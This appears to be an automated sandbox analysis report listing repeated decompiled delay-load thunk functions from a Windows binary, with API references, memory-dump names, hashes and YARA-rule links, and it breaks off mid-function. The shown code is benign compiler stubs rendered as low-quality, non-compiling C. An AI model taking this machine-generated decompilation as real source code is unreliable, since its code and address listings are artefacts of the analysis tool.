                                                                                                                                                    C-Code - Quality: 22%
                                                                                                                                                    			E0122D948() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x124adc4); // executed
				E0122DDAF(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                                                                                                                    0x0122d903
                                                                                                                                                    0x0122d908
                                                                                                                                                    0x0122d90f

                                                                                                                                                    APIs
                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0122D908
                                                                                                                                                      • Part of subcall function 0122DDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0122DE2C
                                                                                                                                                      • Part of subcall function 0122DDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0122DE3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                    • Opcode ID: c0b2b9a7ef0f9ebb9bd0e24bc51ae027648dc97d75f7d25d04bb89e9106fc973
                                                                                                                                                    • Instruction ID: 607735f11a48e93f5242021637c367a3fc0488430138db5fbca59d0a08e1aa60
                                                                                                                                                    • Opcode Fuzzy Hash: c0b2b9a7ef0f9ebb9bd0e24bc51ae027648dc97d75f7d25d04bb89e9106fc973
                                                                                                                                                    • Instruction Fuzzy Hash: 90A001E76B992BBE324872A2AD0AD3E021DC4E4A623B4995EF446850C4A88818450031
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122D952, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 22%
                                                                                                                                                    			E0122D952() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x124adc4); // executed
				E0122DDAF(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                                                                                                                    0x0122d903
                                                                                                                                                    0x0122d908
                                                                                                                                                    0x0122d90f

                                                                                                                                                    APIs
                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0122D908
                                                                                                                                                      • Part of subcall function 0122DDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0122DE2C
                                                                                                                                                      • Part of subcall function 0122DDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0122DE3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                    • Opcode ID: 7466112c058c838b47f3193d5bad8a6eea66292eb1ad9d052d8a7df43e82278e
                                                                                                                                                    • Instruction ID: 607735f11a48e93f5242021637c367a3fc0488430138db5fbca59d0a08e1aa60
                                                                                                                                                    • Opcode Fuzzy Hash: 7466112c058c838b47f3193d5bad8a6eea66292eb1ad9d052d8a7df43e82278e
                                                                                                                                                    • Instruction Fuzzy Hash: 90A001E76B992BBE324872A2AD0AD3E021DC4E4A623B4995EF446850C4A88818450031
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122D8FB, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 22%
                                                                                                                                                    			E0122D8FB() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x124adc4); // executed
				E0122DDAF(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                                                                                                                    0x0122d903
                                                                                                                                                    0x0122d908
                                                                                                                                                    0x0122d90f

                                                                                                                                                    APIs
                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0122D908
                                                                                                                                                      • Part of subcall function 0122DDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0122DE2C
                                                                                                                                                      • Part of subcall function 0122DDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0122DE3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                    • Opcode ID: 94604e2c16bdc7dc595d0e4f28304ab2a5839fb4e0901ba0e0666646039727b9
                                                                                                                                                    • Instruction ID: 1315c46ba49892b4a28d65114bf758c6a81c5a4a0d01005356458218bce1eefa
                                                                                                                                                    • Opcode Fuzzy Hash: 94604e2c16bdc7dc595d0e4f28304ab2a5839fb4e0901ba0e0666646039727b9
                                                                                                                                                    • Instruction Fuzzy Hash: 07A001F76B992ABE324872A2AD0AE3E021DC4E0A223B4955EF446950C4A88828550035
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122DA61, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 22%
                                                                                                                                                    			E0122DA61() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x124ae24); // executed
				E0122DDAF(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                                                                                                                    0x0122da26
                                                                                                                                                    0x0122da2b
                                                                                                                                                    0x0122da32

                                                                                                                                                    APIs
                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0122DA2B
                                                                                                                                                      • Part of subcall function 0122DDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0122DE2C
                                                                                                                                                      • Part of subcall function 0122DDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0122DE3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                    • Opcode ID: e0e17d31444567cb35aed186fe041b3308f445075e1105bcc683cbb2bd1e68ab
                                                                                                                                                    • Instruction ID: b58f85c883d0f7632224a48c6c9236be4071d8e2f353161d189183895336e5a6
                                                                                                                                                    • Opcode Fuzzy Hash: e0e17d31444567cb35aed186fe041b3308f445075e1105bcc683cbb2bd1e68ab
                                                                                                                                                    • Instruction Fuzzy Hash: 28A001A76BD92BBD315866A26D0AE3E025CC4E5B61334996EF45289080A9C81C450031
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122DA6B, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 22%
                                                                                                                                                    			E0122DA6B() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x124ae24); // executed
				E0122DDAF(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                                                                                                                    0x0122da26
                                                                                                                                                    0x0122da2b
                                                                                                                                                    0x0122da32

                                                                                                                                                    APIs
                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0122DA2B
                                                                                                                                                      • Part of subcall function 0122DDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0122DE2C
                                                                                                                                                      • Part of subcall function 0122DDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0122DE3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                    • Opcode ID: 6d17df878e4093afa6c243c34ce4a63cfb82d8e54f05a5628ce583304bdd58a7
                                                                                                                                                    • Instruction ID: b58f85c883d0f7632224a48c6c9236be4071d8e2f353161d189183895336e5a6
                                                                                                                                                    • Opcode Fuzzy Hash: 6d17df878e4093afa6c243c34ce4a63cfb82d8e54f05a5628ce583304bdd58a7
                                                                                                                                                    • Instruction Fuzzy Hash: 28A001A76BD92BBD315866A26D0AE3E025CC4E5B61334996EF45289080A9C81C450031
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122DA75, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 22%
                                                                                                                                                    			E0122DA75() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x124ae24); // executed
				E0122DDAF(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                                                                                                                    0x0122da26
                                                                                                                                                    0x0122da2b
                                                                                                                                                    0x0122da32

                                                                                                                                                    APIs
                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0122DA2B
                                                                                                                                                      • Part of subcall function 0122DDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0122DE2C
                                                                                                                                                      • Part of subcall function 0122DDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0122DE3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                    • Opcode ID: acb1b8ec2748442704767ab41d8ed6f63a082512a815b6645e7bf474fb56ede7
                                                                                                                                                    • Instruction ID: b58f85c883d0f7632224a48c6c9236be4071d8e2f353161d189183895336e5a6
                                                                                                                                                    • Opcode Fuzzy Hash: acb1b8ec2748442704767ab41d8ed6f63a082512a815b6645e7bf474fb56ede7
                                                                                                                                                    • Instruction Fuzzy Hash: 28A001A76BD92BBD315866A26D0AE3E025CC4E5B61334996EF45289080A9C81C450031
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122DA4D, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 22%
                                                                                                                                                    			E0122DA4D() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x124ae24); // executed
				E0122DDAF(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                                                                                                                    0x0122da26
                                                                                                                                                    0x0122da2b
                                                                                                                                                    0x0122da32

                                                                                                                                                    APIs
                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0122DA2B
                                                                                                                                                      • Part of subcall function 0122DDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0122DE2C
                                                                                                                                                      • Part of subcall function 0122DDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0122DE3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                    • Opcode ID: 7b7c7b1ddd5893e9a834f9c015909a721c6a05c890ab4626de6da91b51752f02
                                                                                                                                                    • Instruction ID: b58f85c883d0f7632224a48c6c9236be4071d8e2f353161d189183895336e5a6
                                                                                                                                                    • Opcode Fuzzy Hash: 7b7c7b1ddd5893e9a834f9c015909a721c6a05c890ab4626de6da91b51752f02
                                                                                                                                                    • Instruction Fuzzy Hash: 28A001A76BD92BBD315866A26D0AE3E025CC4E5B61334996EF45289080A9C81C450031
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122DAA4, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 22%
                                                                                                                                                    			E0122DAA4() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x124ae44); // executed
				E0122DDAF(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                                                                                                                    0x0122da87
                                                                                                                                                    0x0122da8c
                                                                                                                                                    0x0122da93

                                                                                                                                                    APIs
                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0122DA8C
                                                                                                                                                      • Part of subcall function 0122DDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0122DE2C
                                                                                                                                                      • Part of subcall function 0122DDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0122DE3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                    • Opcode ID: 87b79a05a1597c94e137d0ecef669c6b93ae5687bbde6899e41a280416e0bffb
                                                                                                                                                    • Instruction ID: e27707322c85dc3f3fef9db199fff7c348bf37a1c273f8327b53210287840b37
                                                                                                                                                    • Opcode Fuzzy Hash: 87b79a05a1597c94e137d0ecef669c6b93ae5687bbde6899e41a280416e0bffb
                                                                                                                                                    • Instruction Fuzzy Hash: 1BA001A73FD52BBE315862A26D0BD3E021DC4E8A65364996EF812C5080A9D81C450071
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122DA9A, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 22%
                                                                                                                                                    			E0122DA9A() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x124ae44); // executed
				E0122DDAF(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                                                                                                                    0x0122da87
                                                                                                                                                    0x0122da8c
                                                                                                                                                    0x0122da93

                                                                                                                                                    APIs
                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0122DA8C
                                                                                                                                                      • Part of subcall function 0122DDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0122DE2C
                                                                                                                                                      • Part of subcall function 0122DDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0122DE3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                    • Opcode ID: 76de54f339db00c5355cd7b4d2f6d7f822636171e7bcd8c62e0f50d434f62347
                                                                                                                                                    • Instruction ID: e27707322c85dc3f3fef9db199fff7c348bf37a1c273f8327b53210287840b37
                                                                                                                                                    • Opcode Fuzzy Hash: 76de54f339db00c5355cd7b4d2f6d7f822636171e7bcd8c62e0f50d434f62347
                                                                                                                                                    • Instruction Fuzzy Hash: 1BA001A73FD52BBE315862A26D0BD3E021DC4E8A65364996EF812C5080A9D81C450071
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122D72F, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 22%
                                                                                                                                                    			E0122D72F() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x124ada4); // executed
				E0122DDAF(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                                                                                                                    0x0122d6f4
                                                                                                                                                    0x0122d6f9
                                                                                                                                                    0x0122d700

                                                                                                                                                    APIs
                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0122D6F9
                                                                                                                                                      • Part of subcall function 0122DDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0122DE2C
                                                                                                                                                      • Part of subcall function 0122DDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0122DE3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                    • Opcode ID: 60ccd47b298bc82be5b9010aef320acf70b6364ea67eb64c16617ca85dd9a83b
                                                                                                                                                    • Instruction ID: 3e679b7c22c7bb01ca675bc6276c9f2e6b466ae26c9f43323330ea861afd506e
                                                                                                                                                    • Opcode Fuzzy Hash: 60ccd47b298bc82be5b9010aef320acf70b6364ea67eb64c16617ca85dd9a83b
                                                                                                                                                    • Instruction Fuzzy Hash: 11A001E72B992BBE319862A2AD06D3E121CC8E4AA2334995EF44785480A88818550032
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122D775, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 22%
                                                                                                                                                    			E0122D775() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x124ada4); // executed
				E0122DDAF(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                                                                                                                    0x0122d6f4
                                                                                                                                                    0x0122d6f9
                                                                                                                                                    0x0122d700

                                                                                                                                                    APIs
                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0122D6F9
                                                                                                                                                      • Part of subcall function 0122DDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0122DE2C
                                                                                                                                                      • Part of subcall function 0122DDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0122DE3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                    • Opcode ID: 2bb8eb8e27784f7e5d8142d347bea9ee39618eebd16f459d37ce167b832cf32b
                                                                                                                                                    • Instruction ID: 3e679b7c22c7bb01ca675bc6276c9f2e6b466ae26c9f43323330ea861afd506e
                                                                                                                                                    • Opcode Fuzzy Hash: 2bb8eb8e27784f7e5d8142d347bea9ee39618eebd16f459d37ce167b832cf32b
                                                                                                                                                    • Instruction Fuzzy Hash: 11A001E72B992BBE319862A2AD06D3E121CC8E4AA2334995EF44785480A88818550032
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122D7A7, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 22%
                                                                                                                                                    			E0122D7A7() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x124ada4); // executed
				E0122DDAF(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                                                                                                                    0x0122d6f4
                                                                                                                                                    0x0122d6f9
                                                                                                                                                    0x0122d700

                                                                                                                                                    APIs
                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0122D6F9
                                                                                                                                                      • Part of subcall function 0122DDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0122DE2C
                                                                                                                                                      • Part of subcall function 0122DDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0122DE3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                    • Opcode ID: 06d26cf79b3be554c323bd86393ed418975193d55830e168a1848c1f2eaf5709
                                                                                                                                                    • Instruction ID: 3e679b7c22c7bb01ca675bc6276c9f2e6b466ae26c9f43323330ea861afd506e
                                                                                                                                                    • Opcode Fuzzy Hash: 06d26cf79b3be554c323bd86393ed418975193d55830e168a1848c1f2eaf5709
                                                                                                                                                    • Instruction Fuzzy Hash: 11A001E72B992BBE319862A2AD06D3E121CC8E4AA2334995EF44785480A88818550032
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122D7B1, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 22%
                                                                                                                                                    			E0122D7B1() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
